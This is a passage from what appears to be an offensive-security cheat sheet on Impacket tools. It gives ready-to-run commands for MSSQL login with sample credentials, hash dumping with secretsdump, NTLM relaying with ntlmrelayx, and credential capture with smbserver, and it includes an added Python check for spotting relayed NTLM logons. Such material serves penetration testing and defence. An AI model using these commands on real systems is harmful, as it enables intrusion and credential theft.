IMPACKET

According to the official GitHub repository, Impacket is "a collection of Python classes for working with network protocols". In practice, Impacket is also a collection of tools that are incredibly useful in an offensive operation.

The tools range from something as simple as psexec, which can be used for remote code execution over SMB, to more complicated attacks such as capturing hashes and relay-spraying them across services to exploit a vulnerable service.

The Impacket repository on GitHub:

https://github.com/fortra/impacket

MSSQL-Client

This is an alternative method for accessing the MSSQL server using OS credentials. If you have OS credentials and the server runs MSSQL, then it's best to spray the credentials to check whether access is available.

The following command can be used to access the MSSQL server; -windows-auth selects Windows authentication instead of SQL Server authentication:

impacket-mssqlclient 'particle42.com/db_user:user123$'@192.168.16.18 -windows-auth

Secrets-Dump

This tool can be used to dump the usernames and hashes from the SAM and SYSTEM files in Windows:

impacket-secretsdump -system SYSTEM -sam SAM LOCAL -history 
impacket-secretsdump -system SYSTEM -sam SAM DOMAIN -history 

NTLMRelayx

This tool is one of the most important tools that can be used in a MITM attack. It can receive SMB, HTTP, MSSQL, LDAP, etc. connections, extract the authentication credentials and relay them to another service. Here is an example of relaying received credentials to an SMB service:

impacket-ntlmrelayx -smb2support -t 192.168.16.19 -debug
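
On the target side, a relayed NTLM logon typically appears as a Security event 4624 whose WorkstationName (the original client) does not match the source IpAddress (the relaying host). The following Python detection check is an added example, not part of the original page or of Impacket; the host inventory and the sample events are constructed, and it assumes the events have already been exported as dictionaries.

```python
# Added example: flag NTLM network logons whose workstation name does not
# match the source IP, a common heuristic for relayed authentication.
# Field names follow Windows Security event 4624. INVENTORY and EVENTS are
# constructed sample data, not taken from the page.

INVENTORY = {  # hostname -> known IPs (assumed to come from DHCP/DNS/CMDB)
    "WS-FINANCE01": {"192.168.16.40"},
    "WS-HR02": {"192.168.16.41"},
}

EVENTS = [
    # Legitimate NTLM logon: name and source IP agree.
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "alice", "WorkstationName": "WS-FINANCE01",
     "IpAddress": "192.168.16.40"},
    # Kerberos logon: out of scope for an NTLM relay check.
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "carol", "WorkstationName": "WS-HR02",
     "IpAddress": "192.168.16.77"},
    # NTLM logon claiming to be WS-HR02 but arriving from another address.
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "bob", "WorkstationName": "ws-hr02",
     "IpAddress": "192.168.16.99"},
    # Host missing from the inventory: cannot be compared, so not flagged.
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "dave", "WorkstationName": "LAPTOP-X",
     "IpAddress": "192.168.16.50"},
]

def suspected_relays(events, inventory):
    """Return (user, workstation, source_ip) for mismatched NTLM logons."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4624 or ev.get("LogonType") != 3:
            continue  # only successful network logons
        if ev.get("AuthenticationPackageName", "").upper() != "NTLM":
            continue
        host = ev.get("WorkstationName", "").upper()
        src = ev.get("IpAddress", "")
        known = inventory.get(host)
        if known is None or src in ("", "-", "127.0.0.1", "::1"):
            continue  # unknown host or local source: nothing to compare
        if src not in known:
            findings.append((ev.get("TargetUserName", ""), host, src))
    return findings

if __name__ == "__main__":
    for user, host, src in suspected_relays(EVENTS, INVENTORY):
        print(f"possible relay: {user} as {host} from {src}")
```

A stale inventory, NAT or VPN address pools will produce false positives, so findings are leads for review rather than verdicts.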

SMBServer

This tool can be used to host an SMB service and print the credentials it receives. The credentials can then be cracked using hashcat or john.

impacket-smbserver -port 445 test /home/kali
